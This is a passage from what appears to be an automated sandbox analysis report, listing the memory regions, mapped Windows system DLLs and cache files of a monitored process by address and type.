"private_0x000000001aee0000" filename = "" Region: id = 937 start_va = 0x1aef0000 end_va = 0x1aefffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001aef0000" filename = "" Region: id = 938 start_va = 0x1b000000 end_va = 0x1b00ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001b000000" filename = "" Region: id = 939 start_va = 0x1b010000 end_va = 0x1b01ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001b010000" filename = "" Region: id = 940 start_va = 0x1b020000 end_va = 0x1b02ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001b020000" filename = "" Region: id = 941 start_va = 0x1b130000 end_va = 0x1b13ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001b130000" filename = "" Region: id = 942 start_va = 0x1b140000 end_va = 0x1b14ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001b140000" filename = "" Region: id = 943 start_va = 0x1b150000 end_va = 0x1b15ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001b150000" filename = "" Region: id = 944 start_va = 0x1b160000 end_va = 0x1b16ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001b160000" filename = "" Region: id = 945 start_va = 0x1b170000 end_va = 0x1b17ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001b170000" filename = "" Region: id = 946 start_va = 0x7fe92730000 end_va = 0x7fe9273ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fe92730000" filename = "" Region: id = 947 start_va = 0x350000 end_va = 0x35ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000350000" filename = "" Region: id = 948 start_va = 0x7fefd640000 end_va = 0x7fefd664fff monitored = 0 entry_point = 0x7fefd649658 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\System32\\sspicli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll") Region: id = 949 start_va = 0x350000 end_va = 0x35ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000350000" filename = "" Region: id = 950 start_va = 0x360000 end_va = 0x36ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000360000" filename = "" Region: id = 951 start_va = 0x370000 end_va = 0x37ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000370000" filename = "" Region: id = 952 start_va = 0x380000 end_va = 0x38ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000380000" filename = "" Region: id = 953 start_va = 0x390000 end_va = 0x39ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000390000" filename = "" Region: id = 954 start_va = 0x5a0000 end_va = 0x5affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005a0000" filename = "" Region: id = 955 start_va = 0x5b0000 end_va = 0x5bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005b0000" filename = "" Region: id = 956 start_va = 0x350000 end_va = 0x35ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000350000" filename = "" Region: id = 957 start_va = 0x360000 end_va = 0x36ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000360000" filename = "" Region: id = 958 start_va = 0x370000 end_va = 0x37ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000370000" filename = "" Region: id = 959 start_va = 0x380000 end_va = 0x38ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000380000" filename = "" Region: id = 960 start_va = 0x390000 end_va = 0x39ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000390000" filename = "" Region: id = 961 start_va = 0x5a0000 end_va = 0x5affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005a0000" filename = "" Region: id = 962 start_va = 0x5b0000 end_va = 0x5bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005b0000" filename = "" Region: id = 963 start_va = 0x350000 end_va = 0x35ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000350000" filename = "" Region: id = 964 start_va = 0x360000 end_va = 0x36ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000360000" filename = "" Region: id = 965 start_va = 0x370000 end_va = 0x37ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000370000" filename = "" Region: id = 966 start_va = 0x380000 end_va = 0x38ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000380000" filename = "" Region: id = 967 start_va = 0x390000 end_va = 0x39ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000390000" filename = "" Region: id = 968 start_va = 0x5a0000 end_va = 0x5affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005a0000" filename = "" Region: id = 969 start_va = 0x5b0000 end_va = 0x5bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005b0000" filename = "" Region: id = 970 start_va = 0x5c0000 end_va = 0x5cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005c0000" filename = "" Region: id = 971 start_va = 0x5d0000 end_va = 0x5dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005d0000" filename = "" Region: id = 972 start_va = 0x350000 end_va = 0x35ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000350000" filename = "" Region: id = 973 start_va = 0x350000 end_va = 0x35ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000350000" filename = "" Region: id = 974 start_va = 0x350000 end_va = 0x35ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000350000" filename = "" Region: id = 975 start_va = 0x350000 end_va = 0x35ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000350000" filename = "" Region: id = 976 start_va = 0x350000 end_va = 0x35ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000350000" filename = "" Region: id = 977 start_va = 0x360000 end_va = 0x36ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000360000" filename = "" Region: id = 978 start_va = 0x370000 end_va = 0x37ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000370000" filename = "" Region: id = 979 start_va = 0x380000 end_va = 0x38ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000380000" filename = "" Region: id = 980 start_va = 0x390000 end_va = 0x39ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000390000" filename = "" Region: id = 981 start_va = 0x350000 end_va = 0x35ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000350000" filename = "" Region: id = 982 start_va = 0x360000 end_va = 0x36ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000360000" filename = "" Region: id = 983 start_va = 0x370000 end_va = 0x37ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000370000" filename = "" Region: id = 984 start_va = 0x779f0000 end_va = 0x779f6fff monitored = 0 entry_point = 0x779f106c region_type = mapped_file name = "psapi.dll" filename = "\\Windows\\System32\\psapi.dll" (normalized: "c:\\windows\\system32\\psapi.dll") Region: id = 985 start_va = 0x9b0000 end_va = 0xa6ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "kernelbase.dll.mui" filename = "\\Windows\\System32\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\kernelbase.dll.mui") Region: id = 986 start_va = 0x350000 end_va = 0x35ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000350000" filename = "" Region: id = 987 start_va = 0x360000 end_va = 0x36ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000360000" filename = "" Region: id = 988 start_va = 0x370000 end_va = 0x37ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000370000" filename = "" Region: id = 989 start_va = 0x380000 end_va = 0x38ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000380000" filename = "" Region: id = 990 start_va = 0x390000 end_va = 0x39ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000390000" filename = "" Region: id = 991 start_va = 0x5a0000 end_va = 0x5affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005a0000" filename = "" Region: id = 992 start_va = 0x7fefe070000 end_va = 0x7fefedf7fff monitored = 0 entry_point = 0x7fefe0ecebc region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll") Region: id = 993 start_va = 0x350000 end_va = 0x350fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000350000" filename = "" Region: id = 994 start_va = 0x7fef6e40000 end_va = 0x7fef6e55fff monitored = 1 entry_point = 0x7fef6e4e5e0 region_type = mapped_file name = "nlssorting.dll" filename = "\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\nlssorting.dll" (normalized: "c:\\windows\\microsoft.net\\framework64\\v4.0.30319\\nlssorting.dll") Region: id = 995 start_va = 0x1b130000 end_va = 0x1b401fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nlp" filename = "\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\sortdefault.nlp" (normalized: "c:\\windows\\microsoft.net\\framework64\\v4.0.30319\\sortdefault.nlp") Region: id = 996 start_va = 0x360000 end_va = 0x36ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000360000" filename = "" Region: id = 997 start_va = 0x370000 end_va = 0x37ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000370000" filename = "" Region: id = 998 start_va = 0x380000 end_va = 0x38ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000380000" filename = "" Region: id = 999 start_va = 0x390000 end_va = 0x39ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000390000" filename = "" Region: id = 1000 start_va = 0x360000 end_va = 0x36ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000360000" filename = "" Region: id = 1001 start_va = 0x370000 end_va = 0x37ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000370000" filename = "" Region: id = 1002 start_va = 0x380000 end_va = 0x38ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000380000" filename = "" Region: id = 1003 start_va = 0x390000 end_va = 0x39ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000390000" filename = "" Region: id = 1004 start_va = 0x5a0000 end_va = 0x5affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005a0000" filename = "" Region: id = 1005 start_va = 0x5b0000 end_va = 0x5bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005b0000" filename = "" Region: id = 1006 start_va = 0x5c0000 end_va = 0x5cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005c0000" filename = "" Region: id = 1007 start_va = 0x5d0000 end_va = 0x5dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005d0000" filename = "" Region: id = 1008 start_va = 0x5e0000 end_va = 0x5effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005e0000" filename = "" Region: id = 1009 start_va = 0x5f0000 end_va = 0x5fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005f0000" filename = "" Region: id = 1010 start_va = 0xa70000 end_va = 0xa7ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000a70000" filename = "" Region: id = 1011 start_va = 0xa80000 end_va = 0xa8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000a80000" filename = "" Region: id = 1012 start_va = 0xa90000 end_va = 0xa9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000a90000" filename = "" Region: id = 1013 start_va = 0xc30000 end_va = 0xc3ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000c30000" filename = "" Region: id = 1014 start_va = 0xc40000 end_va = 0xc4ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000c40000" filename = "" Region: id = 1015 start_va = 0x360000 end_va = 0x36ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000360000" filename = "" Region: id = 1016 start_va = 0x370000 end_va = 0x37ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000370000" filename = "" Region: id = 1017 start_va = 0x380000 end_va = 0x38ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000380000" filename = "" Region: id = 1018 start_va = 0x7fe92740000 end_va = 0x7fe9274ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fe92740000" filename = "" Region: id = 1019 start_va = 0x390000 end_va = 0x39ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000390000" filename = "" Region: id = 1020 start_va = 0x5a0000 end_va = 0x5affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005a0000" filename = "" Region: id = 1021 start_va = 0x5b0000 end_va = 0x5bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005b0000" filename = "" Region: id = 1022 start_va = 0x5c0000 end_va = 0x5cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005c0000" filename = "" Region: id = 1023 start_va = 0x5d0000 end_va = 0x5dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005d0000" filename = "" Region: id = 1024 start_va = 0x5e0000 end_va = 0x5effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005e0000" filename = "" Region: id = 1025 start_va = 0x5f0000 end_va = 0x5fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005f0000" filename = "" Region: id = 1026 start_va = 0xa70000 end_va = 0xa7ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000a70000" filename = "" Region: id = 1027 start_va = 0xa80000 end_va = 0xa8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000a80000" filename = "" Region: id = 1028 start_va = 0xa90000 end_va = 0xa9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000a90000" filename = "" Region: id = 1029 start_va = 0xc30000 end_va = 0xc3ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000c30000" filename = "" Region: id = 1030 start_va = 0xc40000 end_va = 0xc4ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000c40000" filename = "" Region: id = 1031 start_va = 0xe50000 end_va = 0xe5ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000e50000" filename = "" Region: id = 1032 start_va = 0x360000 end_va = 0x36ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000360000" filename = "" Region: id = 1033 start_va = 0x360000 end_va = 0x36ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000360000" filename = "" Region: id = 1034 start_va = 0x370000 end_va = 0x37ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000370000" filename = "" Region: id = 1035 start_va = 0x380000 end_va = 0x38ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000380000" filename = "" Region: id = 1036 start_va = 0x360000 end_va = 0x36ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000360000" filename = "" Region: id = 1037 start_va = 0x370000 end_va = 0x37ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000370000" filename = "" Region: id = 1038 start_va = 0x360000 end_va = 0x36ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000360000" filename = "" Region: id = 1039 start_va = 0x370000 end_va = 0x37ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000370000" filename = "" Region: id = 1040 start_va = 0x380000 end_va = 0x38ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000380000" filename = "" Region: id = 1041 start_va = 0x390000 end_va = 0x39ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000390000" filename = "" Region: id = 1042 start_va = 0x5a0000 end_va = 0x5affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005a0000" filename = "" Region: id = 1043 start_va = 0x7fefd1e0000 end_va = 0x7fefd201fff monitored = 0 entry_point = 0x7fefd1e5d30 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\System32\\bcrypt.dll" (normalized: "c:\\windows\\system32\\bcrypt.dll") Region: id = 1044 start_va = 0x7fefd780000 end_va = 0x7fefd78efff monitored = 0 entry_point = 0x7fefd7819b0 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll") Region: id = 1045 start_va = 0x7fefd070000 end_va = 0x7fefd087fff monitored = 0 entry_point = 0x7fefd073b48 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll") Region: id = 1046 start_va = 0x5a0000 end_va = 0x5e4fff monitored = 0 entry_point = 0x5a1064 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 1047 start_va = 0x5a0000 end_va = 0x5e4fff monitored = 0 entry_point = 0x5a1064 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 1048 start_va = 0x5a0000 end_va = 0x5e4fff monitored = 0 entry_point = 0x5a1064 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 1049 start_va = 0x5a0000 end_va = 0x5e4fff monitored = 0 entry_point = 0x5a1064 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 1050 start_va = 0x5a0000 end_va = 0x5e4fff monitored = 0 entry_point = 0x5a1064 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 1051 start_va = 0x7fefcd70000 end_va = 0x7fefcdb6fff monitored = 0 entry_point = 0x7fefcd71064 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 1052 start_va = 0x360000 end_va = 0x36ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000360000" filename = "" Region: id = 1053 start_va = 0x370000 end_va = 0x37ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000370000" filename = "" Region: id = 1054 start_va = 0x380000 end_va = 0x38ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000380000" filename = "" Region: id = 1055 start_va = 0x360000 end_va = 0x36ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000360000" filename = "" Region: id = 1056 start_va = 0x370000 end_va = 0x37ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000370000" filename = "" Region: id = 1057 start_va = 0x360000 end_va = 0x36ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000360000" filename = "" Region: id = 1058 start_va = 0x370000 end_va = 0x37ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000370000" filename = "" Region: id = 1059 start_va = 0x380000 end_va = 0x38ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000380000" filename = "" Region: id = 1060 start_va = 0x1b580000 end_va = 0x1b67ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001b580000" filename = "" Region: id = 1061 start_va = 0x7ffffefa000 end_va = 0x7ffffefbfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007ffffefa000" filename = "" Region: id = 1062 start_va = 0x1b7f0000 end_va = 0x1b8effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001b7f0000" filename = "" Region: id = 1063 start_va = 0x7ffffef8000 end_va = 0x7ffffef9fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007ffffef8000" filename = "" Region: id = 1064 start_va = 0x360000 end_va = 0x36ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000360000" filename = "" Region: id = 1065 start_va = 0x360000 end_va = 0x36ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000360000" filename = "" Region: id = 1066 start_va = 0x370000 end_va = 0x37ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000370000" filename = "" Region: id = 1067 start_va = 0x380000 end_va = 0x38ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000380000" filename = "" Region: id = 1068 start_va = 0x360000 end_va = 0x36ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000360000" filename = "" Region: id = 1069 start_va = 0x370000 end_va = 0x37ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000370000" filename = "" Region: id = 1070 start_va = 0x360000 end_va = 0x36ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000360000" filename = "" Region: id = 1071 start_va = 0x370000 end_va = 0x37ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000370000" filename = "" Region: id = 1072 start_va = 0x1b9c0000 end_va = 0x1babffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001b9c0000" filename = "" Region: id = 1073 start_va = 0x7ffffef6000 end_va = 0x7ffffef7fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007ffffef6000" filename = "" Region: id = 1074 start_va = 0x7fefc0d0000 end_va = 0x7fefc125fff monitored = 0 entry_point = 0x7fefc0dbbc0 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\System32\\uxtheme.dll" (normalized: "c:\\windows\\system32\\uxtheme.dll") Region: id = 1075 start_va = 0x1a830000 end_va = 0x1a8bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001a830000" filename = "" Region: id = 1076 start_va = 0x7fefc130000 end_va = 0x7fefc25bfff monitored = 0 entry_point = 0x7fefc1394bc region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\System32\\propsys.dll" (normalized: "c:\\windows\\system32\\propsys.dll") Region: id = 1077 start_va = 0x7fefdf90000 end_va = 0x7fefe066fff monitored = 0 entry_point = 0x7fefdf93274 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 1078 start_va = 0x360000 end_va = 0x361fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000360000" filename = "" Region: id = 1079 start_va = 0x7fefc2b0000 end_va = 0x7fefc4a3fff monitored = 0 entry_point = 0x7fefc43c924 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\winsxs\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac\\comctl32.dll") Region: id = 1080 start_va = 0x370000 end_va = 0x370fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "windowsshell.manifest" filename = "\\Windows\\WindowsShell.Manifest" (normalized: "c:\\windows\\windowsshell.manifest") Region: id = 1081 start_va = 0x380000 end_va = 0x381fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000380000" filename = "" Region: id = 1082 start_va = 0x7fefa0f0000 end_va = 0x7fefa146fff monitored = 0 entry_point = 0x7fefa0f1118 region_type = mapped_file name = "apphelp.dll" filename = "\\Windows\\System32\\apphelp.dll" (normalized: "c:\\windows\\system32\\apphelp.dll") Region: id = 1083 start_va = 0x370000 end_va = 0x370fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000370000" filename = "" Region: id = 1084 start_va = 0x7feff360000 end_va = 0x7feff3f8fff monitored = 0 entry_point = 0x7feff361c10 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll") Region: id = 1085 start_va = 0x390000 end_va = 0x390fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000390000" filename = "" Region: id = 1086 start_va = 0x7fef5700000 end_va = 0x7fef62b6fff monitored = 0 entry_point = 0x7fef5701bd8 region_type = mapped_file name = "ieframe.dll" filename = "\\Windows\\System32\\ieframe.dll" (normalized: "c:\\windows\\system32\\ieframe.dll") Region: id = 1087 start_va = 0x7fef56a0000 end_va = 0x7fef56f3fff monitored = 0 entry_point = 0x7fef56a104c region_type = mapped_file name = "oleacc.dll" filename = "\\Windows\\System32\\oleacc.dll" (normalized: "c:\\windows\\system32\\oleacc.dll") Region: id = 1088 start_va = 0x7fefeea0000 end_va = 0x7feff0f8fff monitored = 0 entry_point = 0x7fefeea1340 region_type = mapped_file name = "iertutil.dll" filename = "\\Windows\\System32\\iertutil.dll" (normalized: "c:\\windows\\system32\\iertutil.dll") Region: id = 1089 start_va = 0x5a0000 end_va = 0x5a0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "oleaccrc.dll" filename = "\\Windows\\System32\\oleaccrc.dll" (normalized: "c:\\windows\\system32\\oleaccrc.dll") Region: id = 1090 start_va = 0x5b0000 end_va = 0x5b1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005b0000" filename = "" Region: id = 1091 start_va = 0x7feff510000 end_va = 0x7feff687fff monitored = 0 entry_point = 0x7feff5110e0 region_type = mapped_file name = "urlmon.dll" filename = "\\Windows\\System32\\urlmon.dll" (normalized: "c:\\windows\\system32\\urlmon.dll") Region: id = 1092 start_va = 0x7fefde60000 end_va = 0x7fefdf89fff monitored = 0 entry_point = 0x7fefde610d4 region_type = mapped_file name = "wininet.dll" filename = "\\Windows\\System32\\wininet.dll" (normalized: "c:\\windows\\system32\\wininet.dll") Region: id = 1093 start_va = 0x7fefd9e0000 end_va = 0x7fefdb4cfff monitored = 0 entry_point = 0x7fefd9e10b4 region_type = mapped_file name = "crypt32.dll" filename = "\\Windows\\System32\\crypt32.dll" (normalized: "c:\\windows\\system32\\crypt32.dll") Region: id = 1094 start_va = 0x7fefd820000 end_va = 0x7fefd82efff monitored = 0 entry_point = 0x7fefd821020 region_type = mapped_file name = "msasn1.dll" filename = "\\Windows\\System32\\msasn1.dll" (normalized: "c:\\windows\\system32\\msasn1.dll") Region: id = 1095 start_va = 0x7fefb800000 end_va = 0x7fefb82cfff monitored = 0 entry_point = 0x7fefb801010 region_type = mapped_file name = "ntmarta.dll" filename = "\\Windows\\System32\\ntmarta.dll" (normalized: "c:\\windows\\system32\\ntmarta.dll") Region: id = 1096 start_va = 0x7feffae0000 end_va = 0x7feffb31fff monitored = 0 entry_point = 0x7feffae10d4 region_type = mapped_file name = "wldap32.dll" filename = "\\Windows\\System32\\Wldap32.dll" (normalized: "c:\\windows\\system32\\wldap32.dll") Region: id = 1097 start_va = 0x5c0000 end_va = 0x5c3fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "cversions.1.db" filename = "\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\Caches\\cversions.1.db" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\microsoft\\windows\\caches\\cversions.1.db") Region: id = 1098 start_va = 0x5d0000 end_va = 0x5edfff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x000000000000000c.db" filename = "\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\Caches\\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x000000000000000c.db" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\microsoft\\windows\\caches\\{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x000000000000000c.db") Region: id = 1099 start_va = 0x7fefdc80000 end_va = 0x7fefde56fff monitored = 0 entry_point = 0x7fefdc81010 region_type = mapped_file name = "setupapi.dll" filename = "\\Windows\\System32\\setupapi.dll" (normalized: "c:\\windows\\system32\\setupapi.dll") Region: id = 1100 start_va = 0x7fefd9a0000 end_va = 0x7fefd9d5fff monitored = 0 entry_point = 0x7fefd9a1474 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\System32\\cfgmgr32.dll" (normalized: "c:\\windows\\system32\\cfgmgr32.dll") Region: id = 1101 start_va = 0x7fefd980000 end_va = 0x7fefd999fff monitored = 0 entry_point = 0x7fefd981558 region_type = mapped_file name = "devobj.dll" filename = "\\Windows\\System32\\devobj.dll" (normalized: "c:\\windows\\system32\\devobj.dll") Region: id = 1102 start_va = 0x5f0000 end_va = 0x5fcfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "setupapi.dll.mui" filename = "\\Windows\\System32\\en-US\\setupapi.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\setupapi.dll.mui") Region: id = 1103 start_va = 0xa70000 end_va = 0xa70fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000a70000" filename = "" Region: id = 1104 start_va = 0x5c0000 end_va = 0x5c3fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 1105 start_va = 0x1adb0000 end_va = 0x1addffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x0000000000000015.db" filename = 